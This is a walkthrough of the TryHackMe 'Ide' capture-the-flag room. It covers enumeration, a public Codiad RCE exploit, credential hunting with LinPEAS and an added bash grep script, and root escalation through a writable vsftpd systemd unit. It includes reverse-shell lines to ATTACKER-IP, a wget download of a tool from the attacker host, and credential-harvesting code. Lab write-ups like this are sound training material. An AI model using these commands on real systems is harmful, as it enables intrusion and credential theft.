Ide CTF Walkthrough
Intro
Welcome to the new Ide challenge; here is the link to the room page on TryHackMe. To solve the room we will have to do some enumeration, looking carefully everywhere, locate the vulnerability and exploit it to gain initial access. Finally we will do a bit of privilege escalation to become root and read the flag.
​
Whenever you feel ready press "Start Machine" and connect via OpenVPN or use the AttackBox.
​
Let's do it!
​
The Challenge
Let's begin with a port scan with nmap:
nmap -sV -p- MACHINE_IP
​
Here is what we got:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
​
(my suggestion is to run a quick scan of the common ports first and start digging into that output while the slower scan of all 65535 ports runs in the background; that is how the unusual port 62337 turns up)
​
Logging into the FTP server as the anonymous user and having a look around (use ls -a inside the ftp client: the interesting directory name starts with dots, so a plain ls hides it), we find a directory named "..." containing a file named "-":
cd ...
get -
Back on our machine the file is read with cat ./- (a bare cat - would read from stdin instead).
​
Reading the file we learn that some passwords have been reset and the author suggests using the default credentials. So we know the username is john; for the password I tried a few of the most common defaults and it turned out to be REDACTED, quite easy, but we could also brute force it.
​
Navigating to http://ide.thm:62337/ we notice it is running Codiad 2.8.4. A quick search on Exploit-DB shows there is an RCE exploit for it (it needs valid credentials, which is why john's were worth finding); here is the link to the GitHub repo.
​
We can clone the repository to our device:
git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
​
Now run the exploit, giving it the target URL, john's credentials, your IP, a port for the callback and the platform:
python3 exploit.py http://MACHINE_IP:62337/ john password ATTACKER-IP 62337 linux
​
Follow the instructions printed in the terminal to open the listener, and in a couple of seconds you will have a shell.
​
Looking around we can see that there is a user called drac, so we need to become him.
We can speed things up by downloading LinPEAS to the target machine; it scans for misconfigurations, clear-text credentials and other privilege-escalation vectors.
​
If you do not have it installed, run sudo apt install peass and copy the script into the current working directory with:
cp /usr/share/peass/linpeas/linpeas.sh .
​
On our machine, from the directory holding linpeas.sh, serve it with a simple Python web server:
python3 -m http.server
​
On the target navigate to the /tmp directory and download the script:
cd /tmp
wget http://ATTACKER-IP:8000/linpeas.sh
​
Now make the file executable and run it:
chmod +x linpeas.sh
./linpeas.sh
​
Reading through the tool's report we can see that poor drac has his password exposed at: REDACTED
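For the part of the LinPEAS report that matters here, the clear-text credential hunt, here is the manual equivalent as an added example (my own helper, not LinPEAS code and not from the room): one function greps the readable shell and client history files for commands that carry a password, the other greps the usual config file types under a directory for credential-looking assignments that actually have a value. The directories are arguments; on the target you would point it at /home and /var/www.

```shell
#!/usr/bin/env bash
# Added example: manual clear-text credential hunt, the part of LinPEAS's
# report used above. Not from the walkthrough or from LinPEAS. Assumes GNU
# find/grep; the directories to search are passed as arguments.

# History files we can read, with the lines that carry a password on the
# command line (mysql -p..., anything mentioning passw*, su/sudo usage).
hunt_history() {
    find "$1" -type f -readable \
        \( -name '.bash_history' -o -name '.zsh_history' \
           -o -name '.mysql_history' -o -name '.python_history' \) 2>/dev/null |
    while IFS= read -r f; do
        grep -HinE 'passw|mysql .*-p|(^|[;&| ])sudo? ' "$f" 2>/dev/null
    done
}

# Credential-looking assignments (key=value, key: value, 'key' => 'value')
# in config-type files. The value part must be non-empty, so placeholders
# such as password= or 'password' => '' are not reported.
hunt_configs() {
    grep -rIinE \
        "(passw(or)?d|secret|api[_-]?key|token)['\"]?[[:space:]]*(=>|=|:)[[:space:]]*['\"]?[^[:space:]'\"]+" \
        --include='*.php' --include='*.conf' --include='*.ini' --include='*.env' \
        --include='*.yml' --include='*.yaml' --include='*.json' --include='*.xml' \
        --include='*.txt' --include='.env' "$1" 2>/dev/null
}

# Usage: ./credhunt.sh /home /var/www
if [ "$#" -gt 0 ]; then
    for d in "$@"; do
        hunt_history "$d"
        hunt_configs "$d"
    done
fi
```

Both functions print grep-style file:line:text hits, so the output can be piped straight into less or grep again. Expect some noise from keys like token; the point is to have a quick, explainable check when LinPEAS is too loud or cannot be uploaded.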
​
Now we can either switch user with su drac (this needs a proper TTY, so only if you have upgraded the reverse shell) or SSH in as him. If you choose the SSH route:
ssh drac@MACHINE_IP
​
If you want to upgrade the current reverse shell, follow this guide.
​
Once logged in we can get our first flag:
cat /home/drac/user.txt
​
Privilege Escalation
The last objective is to gain root access and read the flag, let's do it!
We can check what we can run as sudo with drac user:
sudo -l
​
We get this output:
User drac may run the following commands on ide: (ALL : ALL) /usr/sbin/service vsftpd restart
​
This means we can restart the FTP service as root. On this box service hands the restart to systemd, so whatever the vsftpd unit file tells systemd to run at (re)start will run as root; if we can write to that unit, we own the restart. First find the unit file:
find / -name "*vsftpd*" 2>/dev/null

Two unit files turn up; checking their permissions, we are allowed to modify only the second one (worth an ls -l on both: if one is a symlink to the other, editing either changes the same file):
/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service
Now we can make our change:
nano /etc/systemd/system/multi-user.target.wants/vsftpd.service

In the [Service] section, replace the existing ExecStartPre= line (line 9 of the file) with:
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/1234 0>&1'

That is the only line we touch. ExecStartPre runs before the service's main process and, since nothing in the unit sets User=, systemd runs it as root; restarting the service through our sudo right therefore hands us a root shell. Two things to expect: bash -i never returns on its own, so vsftpd itself will not come up until we close the shell, and systemd's start timeout may eventually kill the pre-start process together with our shell, so read the flag promptly.
​
Reload the daemon so systemd re-reads the edited unit (this needs root; if it is refused for drac, try the restart anyway: a unit that is not currently loaded is read fresh from disk when the service is started):
systemctl daemon-reload
​
Everything looks ready; on our machine we start a listener:
nc -lvnp 1234
​
And on the target finally run the one command sudo allows us:
sudo /usr/sbin/service vsftpd restart
​
Finally we can read the flag:
cat /root/root.txt
Congratulations, you have successfully pwned the Ide machine.
Catch you in the next CTF 😃